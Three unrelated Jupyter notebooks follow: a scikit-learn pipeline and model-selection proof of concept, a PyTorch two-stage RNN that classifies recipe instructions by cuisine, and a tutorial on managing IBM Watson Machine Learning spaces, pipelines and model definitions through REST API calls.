Pipeline POC work ``` train_df = data_df.drop(labels=['class'], axis=1) labels_srs = data_df['class'] ``` ### Basic scaling ``` from sklearn.preprocessing import StandardScaler from sklearn.feature_selection import SelectKBest, chi2 from sklearn.pipeline import Pipeline from sklearn import svm scaling = StandardScaler() svm_model = svm.SVC(kernel='linear') chi_f_selection = SelectKBest(score_func=chi2, k=8) pipeline_model = Pipeline([ ('chi_selection', chi_f_selection), ('scaling', scaling), ('svc', svm_model)]) fit_model = pipeline_model.fit(train_df, labels_srs) # Now try it out print("score: {}".format(fit_model.score(train_df, y=labels_srs))) print("Sample of Predictions:\n{}".format(fit_model.predict(train_df.sample(n=50)))) ``` ### Grid Search over Pipeline paramaters 1. Feature selection functions and parameters ``` from sklearn.feature_selection import SelectKBest, chi2, f_classif, f_regression from sklearn.model_selection import GridSearchCV scaling = StandardScaler() svm_model = svm.SVC(kernel='linear') chi_f_selection = SelectKBest(score_func=chi2, k=8) pipeline_model = Pipeline([ ('chi_selection', chi_f_selection), ('scaling', scaling), ('svc', svm_model)]) # Commented a few options out in the interest of POC and time param_grid = [ { 'chi_selection__score_func': [chi2], #, f_regression, f_classif], 'scaling__with_mean': [True],#, False], 'scaling__with_std': [True],#, False], 'svc__C': [0.5]#, 1, 5, 10] } ] grid = GridSearchCV(pipeline_model, cv=3, n_jobs=3, param_grid=param_grid) grid_fit_model = grid.fit(train_df, labels_srs) # Now try it out print("score: {}".format(grid_fit_model.score(train_df, y=labels_srs))) print("Sample of Predictions:\n{}".format(grid_fit_model.predict(train_df.sample(n=50)))) print("Best Parameters") grid_fit_model.best_params_ ``` ### Cross Validation score prediction ``` from sklearn.model_selection import cross_val_score cross_val_score(grid_fit_model, train_df, labels_srs, cv=3) ``` ## Bootstrapping ``` from 
sklearn.ensemble import AdaBoostClassifier from sklearn.tree import DecisionTreeClassifier scaling = StandardScaler() dtc_model = DecisionTreeClassifier() ab_dtc_model = AdaBoostClassifier(dtc_model) chi_f_selection = SelectKBest(score_func=chi2, k=8) pipeline_model = Pipeline([ ('chi_selection', chi_f_selection), ('scaling', scaling), ('boost', ab_dtc_model)]) # Commented a few options out in the interest of POC and time param_grid = [ { 'chi_selection__score_func': [chi2], #, f_regression, f_classif], 'scaling__with_mean': [True],#, False], 'scaling__with_std': [True],#, False], 'boost__n_estimators': [10, 50, 200], 'boost__base_estimator': [DecisionTreeClassifier(max_depth=1, min_samples_leaf=1), DecisionTreeClassifier(max_depth=5, min_samples_leaf=3)] } ] grid = GridSearchCV(pipeline_model, cv=3, n_jobs=6, param_grid=param_grid) grid_fit_model = grid.fit(train_df, labels_srs) # Now try it out print("score: {}".format(grid_fit_model.score(train_df, y=labels_srs))) print("Sample of Predictions:\n{}".format(grid_fit_model.predict(train_df.sample(n=50)))) print("Best Parameters") grid_fit_model.best_params_ ``` ## Model Selection ``` from sklearn.neighbors import KNeighborsClassifier from sklearn.svm import SVC from sklearn.tree import DecisionTreeClassifier from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier classifiers = dict( knn3=KNeighborsClassifier(3), svc=SVC(kernel="linear", C=0.025), tree=DecisionTreeClassifier(max_depth=5), forest=RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1), boost=AdaBoostClassifier() ) from sklearn.preprocessing import StandardScaler from sklearn.feature_selection import SelectKBest, chi2 from sklearn.pipeline import Pipeline from sklearn import svm scaling = StandardScaler() svm_model = svm.SVC(kernel='linear') chi_f_selection = SelectKBest(score_func=chi2, k=8) def get_score(name, model): pipeline_model = Pipeline([ ('chi_selection', chi_f_selection), ('scaling', scaling), (name, model)]) 
fit_model = pipeline_model.fit(train_df, labels_srs) score = fit_model.score(train_df, y=labels_srs) return score results = {name: get_score(name, model) for name, model in classifiers.items()} for name, score in results.items(): print("{name}: score={score}".format(name=name, score=score)) ```
github_jupyter
``` import pandas as pd import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from torch.utils.data import Dataset from torch.autograd import Variable import string import pickle as pkl import random import pdb import re from functools import partial from collections import Counter, defaultdict from sklearn.model_selection import train_test_split from sklearn.model_selection import KFold from sklearn.metrics import roc_auc_score import nltk from nltk.tokenize import word_tokenize from nltk.corpus import stopwords nltk.download('punkt') from gensim.models.keyedvectors import KeyedVectors import matplotlib.pyplot as plt RANDOM_STATE = 42 ``` ### Get pre-trained embeddings ``` # encode the pretrained embedding to text file model = KeyedVectors.load_word2vec_format('/home/hb1500/Plated/vocab.bin', binary=True) model.save_word2vec_format('pretrained_embd.txt', binary=False) # load embeddings # There are three types of embeddings: # pretrained_embd (from Recipe101); pretrained_embd (Recipe101 + Plated); Glove.6B.50d def load_emb_vectors(fname): data = {} with open(fname, 'r') as f: for line in f: splitLine = line.split() word = splitLine[0] embedding = np.array([float(val) for val in splitLine[1:]]) data[word] = embedding return data #fname = 'pretrained_embd.txt' #fname = '/Users/hetianbai/Desktop/DS-GA 1011/Labs/lab5/glove.6B/glove.6B.50d.txt' fname = '/scratch/hb1500/Plated/glove.6B/glove.6B.50d.txt' words_emb_dict = load_emb_vectors(fname) ``` ### Load Cleaned Data ``` # the data is the output of "Consolidated Data Cleaning" data_all = pd.read_csv('/home/hb1500/Plated/cleaned_recipe_data.csv', index_col=0) # augmentated data saved to: https://drive.google.com/open?id=10Y3wExYdavqalI17d7KBI2RdKjRu4UP3 data_all_aug = pd.read_csv('/home/hb1500/Plated/augmented_instruction.csv', index_col=0) assert (data_all['external_id'].tolist() == data_all_aug['external_id'].tolist()) data_intruction = data_all[['external_id','step_one','step_two', 
'step_three', 'step_four', 'step_five', 'step_six']] data_intruction_aug = data_all_aug[['external_id','step_one_sp', 'step_two_sp', 'step_three_sp', 'step_four_sp', 'step_five_sp', 'step_six_sp']] data_cuisine_tags = data_all[['external_id','tag_cuisine_indian', 'tag_cuisine_nordic', 'tag_cuisine_european', 'tag_cuisine_asian', 'tag_cuisine_mexican', 'tag_cuisine_latin-american', 'tag_cuisine_french', 'tag_cuisine_italian', 'tag_cuisine_african', 'tag_cuisine_mediterranean', 'tag_cuisine_american', 'tag_cuisine_middle-eastern']] ``` ### Tokenization ``` # lowercase and remove punctuation def tokenizer(sent): #print(sent) if pd.isnull(sent): words = [] else: table = str.maketrans(string.punctuation, ' '*len(string.punctuation)) sent = sent.translate(table) tokens = word_tokenize(sent) # convert to lower case tokens = [w.lower() for w in tokens] # remove punctuation from each word #table = str.maketrans('', '', string.punctuation) #stripped = [w.translate(table) for w in tokens] # remove remaining tokens that are not alphabetic words = [word for word in tokens if word.isalpha()] #re.findall(r'\d+', 'sdfa') return words def tokenize_dataset(step_n): """returns tokenization for each step, training set tokenizatoin""" token_dataset = [] for sample in step_n: tokens = tokenizer(sample) token_dataset.append(tokens) return token_dataset def all_tokens_list(train_data): """returns all tokens of instruction (all steps) for creating vocabulary""" all_tokens = [] for columns in train_data.columns[1:]: for sample in train_data[columns]: all_tokens += sample[:] return all_tokens print('Processing original instruction data') # tokenize each steps on original datasets data_instruction_tokenized = pd.DataFrame() for steps in data_intruction.columns[1:]: data_instruction_tokenized[steps] = tokenize_dataset(data_intruction[steps]) print(steps, 'has been tokenized.') data_instruction_tokenized['external_id'] = data_intruction['external_id'] # tokenize each steps on augmented datasets 
print('Processing augmented instruction data') data_instruction_aug_tokenized = pd.DataFrame() for steps in data_intruction_aug.columns[1:]: data_instruction_aug_tokenized[steps] = tokenize_dataset(data_intruction_aug[steps]) print(steps, 'has been tokenized.') data_instruction_aug_tokenized['external_id'] = data_intruction_aug['external_id'] assert (data_instruction_tokenized.shape[0] == data_cuisine_tags.shape[0]) assert (data_instruction_tokenized.shape[0] == data_instruction_aug_tokenized.shape[0]) # add tags to tokenized dataframe data_instruction_tokenized = data_instruction_tokenized.merge(data_cuisine_tags, on = 'external_id') data_instruction_aug_tokenized = data_instruction_aug_tokenized.merge(data_cuisine_tags, on = 'external_id') ## save #data_instruction_tokenized.to_csv('data_instruction_tokenized.csv') #data_instruction_aug_tokenized.to_csv('data_instruction_aug_tokenized.csv') ``` Naming two dataframes: one for intructions (with id) and the other for tags (with id) ``` data_intruction = data_instruction_tokenized[['external_id','step_one','step_two', 'step_three', 'step_four', 'step_five', 'step_six']] data_tags = data_instruction_tokenized[['external_id','tag_cuisine_indian', 'tag_cuisine_nordic', 'tag_cuisine_european', 'tag_cuisine_asian', 'tag_cuisine_mexican', 'tag_cuisine_latin-american', 'tag_cuisine_french', 'tag_cuisine_italian', 'tag_cuisine_african', 'tag_cuisine_mediterranean', 'tag_cuisine_american', 'tag_cuisine_middle-eastern']] ``` Split train and test sets ``` X_train, test_data, y_train, test_tags = train_test_split(data_intruction, data_tags, test_size=0.1, random_state=RANDOM_STATE) #train_data, val_data, train_tags, val_tags = train_test_split(X_train, y_train, test_size=0.1, random_state=RANDOM_STATE) ``` Cross validation for train and validation ``` kf = KFold(n_splits=5, shuffle=False, random_state=RANDOM_STATE) k = 1 for train_index, val_index in kf.split(X_train): print('===================== This is the Kfold {} 
====================='.format(k)) k += 1 train_data, val_data = X_train.iloc[train_index], X_train.iloc[val_index] train_tags, val_tags = y_train.iloc[train_index], y_train.iloc[val_index] if params['add_data_aug']: ##### add augmentation to training set by index ##### train_data_aug = data_instruction_aug_tokenized[data_instruction_aug_tokenized['external_id'].isin(list(train_data['external_id']))] train_data_aug_instrc = train_data_aug[['external_id', 'step_one_sp', 'step_two_sp', 'step_three_sp', 'step_four_sp', 'step_five_sp', 'step_six_sp']] train_data_aug_instrc.columns = ['external_id','step_one','step_two', 'step_three', 'step_four', 'step_five', 'step_six'] train_data_aug_label = train_data_aug[['external_id','tag_cuisine_indian', 'tag_cuisine_nordic', 'tag_cuisine_european','tag_cuisine_asian', 'tag_cuisine_mexican', 'tag_cuisine_latin-american', 'tag_cuisine_french', 'tag_cuisine_italian', 'tag_cuisine_african', 'tag_cuisine_mediterranean', 'tag_cuisine_american', 'tag_cuisine_middle-eastern']] # concatenate dfs train_data = pd.concat([train_data, train_data_aug_instrc],axis=0, ignore_index=True) train_tags = pd.concat([train_tags, train_data_aug_label],axis=0, ignore_index=True) ##### add augmentation to training set by index ##### # lookup table all_train_tokens = all_tokens_list(train_data) max_vocab_size = len(list(set(all_train_tokens))) token2id, id2token = build_vocab(all_train_tokens, max_vocab_size) random_token_id = random.randint(0, len(id2token)-1) random_token = id2token[random_token_id] emb_weight = build_emb_weight(words_emb_dict, id2token) train_data_indices = token2index_dataset(train_data, token2id) val_data_indices = token2index_dataset(val_data, token2id) test_data_indices = token2index_dataset(test_data, token2id) # batchify datasets: train_loader, val_loader, test_loader = create_dataset_obj(train_data_indices, val_data_indices, test_data_indices, train_targets, val_targets, test_targets, BATCH_SIZE, max_sent_len, collate_func) 
#load pre-embeddings weights_matrix = torch.from_numpy(emb_weight) # define model model_train(rnn_1,hidden_dim1,bi,rnn_2, hidden_dim2, batch_size, cuda_on, num_classes) break ``` All tokens from training set ``` # form all tokens list all_train_tokens = all_tokens_list(train_data) ``` Let's decide which tag to predict for trail ``` data_cuisine_tags.iloc[:,1:].sum()/data_cuisine_tags.iloc[:,1:].shape[0] ``` Choose tag: tag_cuisine_american, which 27.3525% are 1 ### Build vocabulary and indexing ``` len(list(set(all_train_tokens))) token_counter = Counter(all_train_tokens) # token_counter.most_common # save index 0 for unk and 1 for pad def build_vocab(all_tokens, max_vocab_size): # Returns: # id2token: list of tokens, where id2token[i] returns token that corresponds to token i # token2id: dictionary where keys represent tokens and corresponding values represent indices PAD_IDX = 0 UNK_IDX = 1 token_counter = Counter(all_tokens) vocab, count = zip(*token_counter.most_common(max_vocab_size)) id2token = list(vocab) token2id = dict(zip(vocab, range(2,2+len(vocab)))) id2token = ['<pad>', '<unk>'] + id2token token2id['<pad>'] = PAD_IDX token2id['<unk>'] = UNK_IDX return token2id, id2token max_vocab_size = len(list(set(all_train_tokens))) token2id, id2token = build_vocab(all_train_tokens, max_vocab_size) random_token_id = random.randint(0, len(id2token)-1) random_token = id2token[random_token_id] print("Token id {} ; token {}".format(random_token_id, id2token[random_token_id])) print("Token {}; token id {}".format(random_token, token2id[random_token])) def build_emb_weight(words_emb_dict, id2token): vocab_size = len(id2token) emb_dim = len(words_emb_dict['a']) emb_weight = np.zeros([vocab_size, emb_dim]) for i in range(2,vocab_size): emb = words_emb_dict.get(id2token[i], None) if emb is not None: emb_weight[i] = emb return emb_weight emb_weight = build_emb_weight(words_emb_dict, id2token) sum(np.sum(emb_weight,1)==0)/emb_weight.shape[0] ``` Reconstruct data strcuture for 
datasets ``` # convert token to id in the dataset def token2index_dataset(tokens_data, token2id): """returns [[[step1 indices],[step2 indices],...,[step6 indices]],[],[],...]""" recipie_indices_data = [] UNK_IDX = 1 for recipie in tokens_data.iterrows(): step_indices_data = [] for step in recipie[1]: index_list = [token2id[token] if token in token2id else UNK_IDX for token in step] step_indices_data.append(index_list) recipie_indices_data.append(step_indices_data) return recipie_indices_data train_data_indices = token2index_dataset(train_data, token2id) val_data_indices = token2index_dataset(val_data, token2id) test_data_indices = token2index_dataset(test_data, token2id) # double checking print ("Train dataset size is {}".format(len(train_data_indices))) print ("Val dataset size is {}".format(len(val_data_indices))) print ("Test dataset size is {}".format(len(test_data_indices))) class IntructionDataset(Dataset): """ Class that represents a train/validation/test dataset that's readable for PyTorch Note that this class inherits torch.utils.data.Dataset """ def __init__(self, data_list, tags_list, max_sent_len): """ @param data_list: list of recipie tokens @param target_list: list of single tag, i.e. 
'tag_cuisine_american' """ self.data_list = data_list self.tags_list = tags_list assert (len(self.data_list) == len(self.tags_list)) def __len__(self): return len(self.data_list) def __getitem__(self, key): """ Triggered when you call recipie[i] """ recipie = self.data_list[key] step1_idx = recipie[0][:max_sent_len[0]] step2_idx = recipie[1][:max_sent_len[1]] step3_idx = recipie[2][:max_sent_len[2]] step4_idx = recipie[3][:max_sent_len[3]] step5_idx = recipie[4][:max_sent_len[4]] step6_idx = recipie[5][:max_sent_len[5]] label = self.tags_list[key] return [[step1_idx, step2_idx, step3_idx, step4_idx, step5_idx, step6_idx], [len(step1_idx),len(step2_idx), len(step3_idx),len(step4_idx), len(step5_idx),len(step6_idx)], label] def collate_func(batch): """ Customized function for DataLoader that dynamically pads the batch so that all data have the same length """ steps_dict = defaultdict(list) label_list = [] length_dict = defaultdict(list) max_sent_len = [] for datum in batch: label_list.append(datum[-1]) for i in range(6): length_dict[i].append(datum[1][i]) # padding for i in range(6): max_sent_len.append(max(length_dict[i])) for datum in batch: for i, step in enumerate(datum[0]): padded_vec = np.pad(np.array(step), pad_width=((0, max_sent_len[i]-datum[1][i])), mode="constant", constant_values=0) steps_dict[i].append(padded_vec) for key in length_dict.keys(): length_dict[key] = torch.LongTensor(length_dict[key]) steps_dict[key] = torch.from_numpy(np.array(steps_dict[key]).astype(np.int)) return [steps_dict, length_dict, torch.LongTensor(label_list)] # Build train, valid and test dataloaders def create_dataset_obj(train,val,test,train_targets,val_targets,test_targets, BATCH_SIZE,max_sent_len,collate_func): collate_func=partial(collate_func) train_dataset = IntructionDataset(train, train_targets, max_sent_len) train_loader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size=BATCH_SIZE, collate_fn=collate_func, shuffle=True) val_dataset = 
IntructionDataset(val, val_targets, max_sent_len) val_loader = torch.utils.data.DataLoader(dataset=val_dataset, batch_size=BATCH_SIZE, collate_fn=collate_func, shuffle=False) test_dataset = IntructionDataset(test, test_targets, max_sent_len) test_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=BATCH_SIZE, collate_fn=collate_func, shuffle=False) return train_loader, val_loader, test_loader def create_emb_layer(weights_matrix, trainable=False): vocab_size, emb_dim = weights_matrix.size() emb_layer = nn.Embedding(vocab_size, emb_dim) emb_layer.load_state_dict({'weight': weights_matrix}) if trainable == False: emb_layer.weight.requires_grad = False return emb_layer, vocab_size, emb_dim class two_stage_RNN(nn.Module): def __init__(self, rnn_1, hidden_dim1, bi, rnn_2, hidden_dim2, batch_size, cuda_on, num_classes): super(two_stage_RNN, self).__init__() self.hidden_dim1 = hidden_dim1 self.hidden_dim2 = hidden_dim2 self.embedding, vocab_size, emb_dim = create_emb_layer(weights_matrix, trainable=False) # module for steps in the fisrt stage # self.hidden_stage1, self.hidden_stage2 = self.init_hidden(batch_size, cuda_on) rnn_common = rnn_1(emb_dim, hidden_dim1, num_layers=1, batch_first=True, bidirectional=bi) self.rnn_each_step = nn.ModuleList([]) for i in range(6): self.rnn_each_step.append(rnn_common) # module for the second stage if bi: self.steps_rnn = rnn_2(hidden_dim1*2, hidden_dim2, num_layers=1, batch_first=False) else: self.steps_rnn = rnn_2(hidden_dim1, hidden_dim2, num_layers=1, batch_first=False) # module for interaction self.linear = nn.Linear(hidden_dim2, num_classes) def forward(self, steps, lengths): # first stage output_each_step = [] for i in range(6): rnn_input = steps[i] emb = self.embedding(rnn_input) # embedding output, _ = self.rnn_each_step[i](emb) #, self.hidden_stage1[str(i)] if bi: output_size = output.size() output = output.view(output_size[0], output_size[1], 2, self.hidden_dim1) if bi: 
output_each_step.append(torch.cat((output[:,-1,0,:],output[:,0,1,:]),1)) else: output_each_step.append(output[:,-1,:]) #second stage output1 = torch.stack(output_each_step, 0) output, _ = self.steps_rnn(output1) #, self.hidden_stage2 logits = self.linear(output[-1,:,:]) #logits = torch.sigmoid(logits) return logits def test_model(loader, model): """ Help function that tests the model's performance on a dataset @param: loader - data loader for the dataset to test against """ logits_all = [] labels_all = [] model.eval() for steps_batch, lengths_batch, labels_batch in loader: for step_id in range(6): lengths_batch[step_id] = lengths_batch[step_id].cuda() steps_batch[step_id] = steps_batch[step_id].cuda() logits = model(steps_batch, lengths_batch) logits_all.extend(list(logits.cpu().detach().numpy())) labels_all.extend(list(labels_batch.numpy())) logits_all = np.array(logits_all) labels_all = np.array(labels_all) auc = roc_auc_score(labels_all, logits_all) predicts = (logits_all > 0.5).astype(int) acc = np.mean(predicts==labels_all) return auc, acc ``` tag_cuisine_indian 0.023525 85% auc tag_cuisine_nordic 0.000399 tag_cuisine_european 0.012360 tag_cuisine_asian 0.182217 98% auc tag_cuisine_mexican 0.013557 tag_cuisine_latin-american 0.094896 90% auc tag_cuisine_french 0.077352 72% auc tag_cuisine_italian 0.233254 80% auc tag_cuisine_african 0.003987 tag_cuisine_mediterranean 0.076555 88% auc tag_cuisine_american 0.273525 80% auc tag_cuisine_middle-eastern 0.046252 87% auc ``` tag_predicted = 'tag_cuisine_american' train_targets = list(train_tags[tag_predicted]) val_targets = list(val_tags[tag_predicted]) test_targets = list(test_tags[tag_predicted]) print(train_tags[tag_predicted].value_counts()) print(val_tags[tag_predicted].value_counts()) print(test_tags[tag_predicted].value_counts()) rnn_types = { 'rnn': nn.RNN, 'lstm': nn.LSTM, 'gru': nn.GRU } params = dict( rnn1_type = 'rnn', rnn2_type = 'rnn', bi = True, hidden_dim1 = 30, hidden_dim2 = 30, num_classes = 1, 
num_epochs = 5, batch_size = 50, learning_rate = 0.01, add_data_aug = True, cuda_on = True ) BATCH_SIZE = params['batch_size'] max_sent_len = np.array([94, 86, 87, 90, 98, 91]) train_loader, val_loader, test_loader = create_dataset_obj(train_data_indices, val_data_indices, test_data_indices, train_targets, val_targets, test_targets, BATCH_SIZE, max_sent_len, collate_func) #build model rnn1_type = params['rnn1_type'] rnn_1 = rnn_types[rnn1_type] rnn2_type = params['rnn2_type'] rnn_2 = rnn_types[rnn2_type] bi = params['bi'] hidden_dim1 = params['hidden_dim1'] hidden_dim2 = params['hidden_dim2'] num_classes = params['num_classes'] batch_size = params['batch_size'] cuda_on = params['cuda_on'] weights_matrix = torch.from_numpy(emb_weight) model = two_stage_RNN(rnn_1, hidden_dim1, bi, rnn_2, hidden_dim2, batch_size, cuda_on, num_classes) model_parameters = filter(lambda p: p.requires_grad, model.parameters()) print('The number of train parameters', sum([np.prod(p.size()) for p in model_parameters])) model = model.cuda() #parameter for training learning_rate = params['learning_rate'] num_epochs = params['num_epochs'] # number epoch to train # Criterion and Optimizer #pos_weight=torch.Tensor([40,]).cuda() criterion = nn.BCEWithLogitsLoss() #torch.nn.BCELoss(); torch.nn.CrossEntropyLoss() optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) train_loss_list = [] for epoch in range(num_epochs): for i, (steps_batch, lengths_batch, labels_batch) in enumerate(train_loader): for step_id in range(6): lengths_batch[step_id] = lengths_batch[step_id].cuda() steps_batch[step_id] = steps_batch[step_id].cuda() model.train() optimizer.zero_grad() outputs = model(steps_batch, lengths_batch) loss = criterion(outputs, labels_batch.view(-1,1).float().cuda()) train_loss_list.append(loss.item()) loss.backward() optimizer.step() # validate every 100 iterations if i % 10 == 0: # validate # print('---------------------') # for p in model.parameters(): # if p.requires_grad: # 
print(p.name, p.size(), p.requires_grad, torch.mean(torch.abs(p.data)), torch.mean(torch.abs(p.grad))) # break val_auc, val_acc = test_model(val_loader, model) print('{}/{}, Step:{}/{}, TrainLoss:{:.6f}, ValAUC:{:.6f} ValAcc:{:.6f}'.format( epoch+1, num_epochs, i+1, len(train_loader), loss, val_auc, val_acc)) val_auc, val_acc = test_model(val_loader, model) train_auc, train_acc = test_model(train_loader, model) print('Epoch: [{}/{}], trainAUC: {:.6f}, trainAcc: {:.6f}'.format(epoch+1, num_epochs, train_auc, train_acc)) print('Epoch: [{}/{}], ValAUC: {:.6f}, ValAcc: {:.6f}'.format(epoch+1, num_epochs, val_auc, val_acc)) def model_train(rnn_1,hidden_dim1,bi,rnn_2, hidden_dim2, batch_size, cuda_on, num_classes): model = two_stage_RNN(rnn_1, hidden_dim1, bi, rnn_2, hidden_dim2, batch_size, cuda_on, num_classes) model_parameters = filter(lambda p: p.requires_grad, model.parameters()) print('The number of train parameters', sum([np.prod(p.size()) for p in model_parameters])) model = model.cuda() #parameter for training learning_rate = params['learning_rate'] num_epochs = params['num_epochs'] # number epoch to train # Criterion and Optimizer criterion = nn.BCEWithLogitsLoss() #torch.nn.BCELoss(); torch.nn.CrossEntropyLoss() optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) train_loss_list = [] train_AUC_list = [] val_AUC_list = [] train_ACC_list = [] val_ACC_list = [] for epoch in range(num_epochs): for i, (steps_batch, lengths_batch, labels_batch) in enumerate(train_loader): for step_id in range(6): lengths_batch[step_id] = lengths_batch[step_id].cuda() steps_batch[step_id] = steps_batch[step_id].cuda() model.train() optimizer.zero_grad() outputs = model(steps_batch, lengths_batch) loss = criterion(outputs, labels_batch.view(-1,1).float().cuda()) train_loss_list.append(loss.item()) loss.backward() optimizer.step() # validate every 10 iterations if i % 10 == 0: val_auc, val_acc = test_model(val_loader, model) print('{}/{}, Step:{}/{}, TrainLoss:{:.6f}, 
ValAUC:{:.6f} ValAcc:{:.6f}'.format( epoch+1, num_epochs, i+1, len(train_loader), loss, val_auc, val_acc)) val_auc, val_acc = test_model(val_loader, model) train_auc, train_acc = test_model(train_loader, model) train_AUC_list.append(train_auc) val_AUC_list.append(val_auc) train_ACC_list.append(train_acc) val_ACC_list.append(val_acc) print('Epoch: [{}/{}], trainAUC: {:.6f}, trainAcc: {:.6f}'.format(epoch+1, num_epochs, train_auc, train_acc)) print('Epoch: [{}/{}], ValAUC: {:.6f}, ValAcc: {:.6f}'.format(epoch+1, num_epochs, val_auc, val_acc)) return train_loss_list, train_AUC_list, val_AUC_list, train_ACC_list, val_ACC_list plt.plot(train_loss_list) plt.show() #train_loss_list print(model) for key, val in model.state_dict().items(): print(key, val.size()) logits_all = [] labels_all = [] model.eval() for steps_batch, lengths_batch, labels_batch in test_loader: for step_id in range(6): lengths_batch[step_id] = lengths_batch[step_id].cuda() steps_batch[step_id] = steps_batch[step_id].cuda() logits = model(steps_batch, lengths_batch) logits_all.extend(list(logits.cpu().detach().numpy())) labels_all.extend(list(labels_batch.numpy())) logits_all = np.array(logits_all) labels_all = np.array(labels_all) auc = roc_auc_score(labels_all, logits_all) predicts = (logits_all > 0.5).astype(int) acc = np.mean(predicts==labels_all) auc from sklearn import metrics fpr, tpr, thresholds = metrics.roc_curve(labels_all, logits_all, pos_label=1) plt.plot(fpr, tpr) for p in model.parameters(): if p.requires_grad: print(p.size()) ```
github_jupyter
# Machine Learning artifacts management This notebook contains steps and code to demonstrate how to manage and clean up Watson Machine Learning instance. This notebook contains steps and code to work with Watson Machine Learning API. This notebook introduces API calls for listing artifacts, getting artifacts details and deleting them. Some familiarity with Python and REST API is helpful. This notebook uses Python 3. ## Learning goals The learning goals of this notebook are: - List Watson Machine Learning artifacts. - Get artifacts details. - Delete artifacts. ## Contents This notebook contains the following parts: 1. [Setup](#setup) 2. [Manage pipelines](#pipelines) 3. [Manage model definitions](#model_definitions) 4. [Manage models](#models) 5. [Manage functions](#functions) 6. [Manage experiments](#experiments) 7. [Manage trainings](#trainings) 8. [Manage deployments](#deployments) 9. [Summary and next steps](#summary) <a id="setup"></a> ## 1. Set up the environment Before you use the sample code in this notebook, you must fill following cell variables. You can find your COS credentials in COS instance dashboard under the **Service credentials** tab. Go to the **Endpoint** tab in the COS instance's dashboard to get the endpoint information. Your Cloud API key can be generated by going to the [**Users** section of the Cloud console](https://cloud.ibm.com/iam#/users). From that page, click your name, scroll down to the **API Keys** section, and click **Create an IBM Cloud API key**. Give your key a name and click **Create**, then copy the created key and paste it below. **NOTE:** You can also get service specific apikey by going to the [**Service IDs** section of the Cloud Console](https://cloud.ibm.com/iam/serviceids). From that page, click **Create**, then copy the created key and paste it below. 
``` API_KEY="" WML_ENDPOINT_URL="" WML_INSTANCE_CRN="fill out only if you want to create new space" WML_INSTANCE_NAME="fill out only if you want to create new space" COS_CRN="fill out only if you want to create new space" space_id="fill out only if you have already created a space" DATAPLATFORM_URL="https://api.dataplatform.cloud.ibm.com" AUTH_ENDPOINT="https://iam.cloud.ibm.com/oidc/token" ``` In order to work with REST API in python you need to import `requests` package. ``` import requests ``` <a id="wml_token"></a> ### Generate WML authorization token for further REST API calls Request params preparation. ``` token_creation_params = { "grant_type": "urn:ibm:params:oauth:grant-type:apikey", "apikey": API_KEY } ``` Token generation. ``` response = requests.post(AUTH_ENDPOINT, params=token_creation_params) token = response.json()['access_token'] print(token) ``` Define requests header for futher REST API calls. ``` header = { 'Authorization': f'Bearer {token}', 'Content-Type': 'application/json', 'Accept': 'application/json' } ``` <a id="space_creation"></a> ### Space creation **Tip:** If you do not have `space` already created, please convert below three `Raw NBConvert` cells to `code` and run them. Prepare payload json for space creation. Create new space. Get created space id. Space creation is asynchronous. This means that you need to check space creation status after creation call. Make sure that your newly created space is `active`. Get space details. ``` space_details = requests.get( url = f"{DATAPLATFORM_URL}/v2/spaces/{space_id}?version=2020-08-01", headers = header ) space_details.json() ``` ### Managing spaces. If you want to get all spaces details you can run following REST API call. If you want to get part of spaces please change the `limit` variable. ``` limit=2 spaces_details = requests.get( url = f"{DATAPLATFORM_URL}/v2/spaces?limit={limit}", headers = header ) ``` Print spaces details json. 
``` spaces_details.json() ``` If you want to list existing spaces names and ids run next cell. ``` for space in spaces_details.json()['resources']: print(f"{space['entity']['name']} \t Id: {space['metadata']['id']}") ``` If you want to delete one of existing spaces you can change next cell Format to `code` and use following REST API call. <a id="pipelines"></a> ## 2. Manage pipelines If you want to get all pipelines details you can run following REST API call. If you want to get part of pipelines please change the `limit` variable. ``` limit=2 pipelines_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/pipelines?version=2020-08-01&space_id={space_id}&limit={limit}", headers = header ) ``` If you want to list existing pipelines names and ids run next cell. ``` for pipeline in pipelines_details.json()['resources']: print(f"{pipeline['metadata']['name']} \t Id: {pipeline['metadata']['id']}") ``` Get pipeline 0 id. ``` pipeline_id = pipelines_details.json()['resources'][0]['metadata']['id'] print(pipeline_id) ``` If you want to get pipeline details you must provide `pipeline_id` and run following REST API call. ``` pipeline_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/pipelines/{pipeline_id}?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print pipeline details. ``` pipelines_details.json() ``` You can delete pipeline by next cell API CALL. ``` pipeline_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/pipelines/{pipeline_id}?version=2020-08-01&space_id={space_id}", headers = header ) if pipeline_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete pipeline: \n {pipeline_delete.json()}') ``` If you want to delete more pipelines run following cell. 
``` for pipeline in pipelines_details.json()['resources']: pipeline_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/pipelines/{pipeline['metadata']['id']}?version=2020-08-01&space_id={space_id}", headers = header ) if pipeline_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete pipeline: \n {pipeline_delete.json()}') ``` <a id="model_definitions"></a> ## 3. Manage model definitions If you want to get all model definitions details you can run following REST API call. If you want to get part of model definitions please change the `limit` variable. ``` limit=2 model_definitions_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/model_definitions?version=2020-08-01&space_id={space_id}&limit={limit}", headers = header ) ``` If you want to list existing model definitions names and ids run next cell. ``` for model_definition in model_definitions_details.json()['resources']: print(f"{model_definition['metadata']['name']} \t Id: {model_definition['metadata']['id']}") ``` Get model definition 0 id. ``` model_definition_id = model_definitions_details.json()['resources'][0]['metadata']['id'] print(model_definition_id) ``` If you want to get model definition details you must provide `model_definition_id` and run following REST API call. ``` model_definition_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/model_definitions/{model_definition_id}?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print model definition details. ``` model_definition_details.json() ``` You can delete model definition by next cell API CALL. 
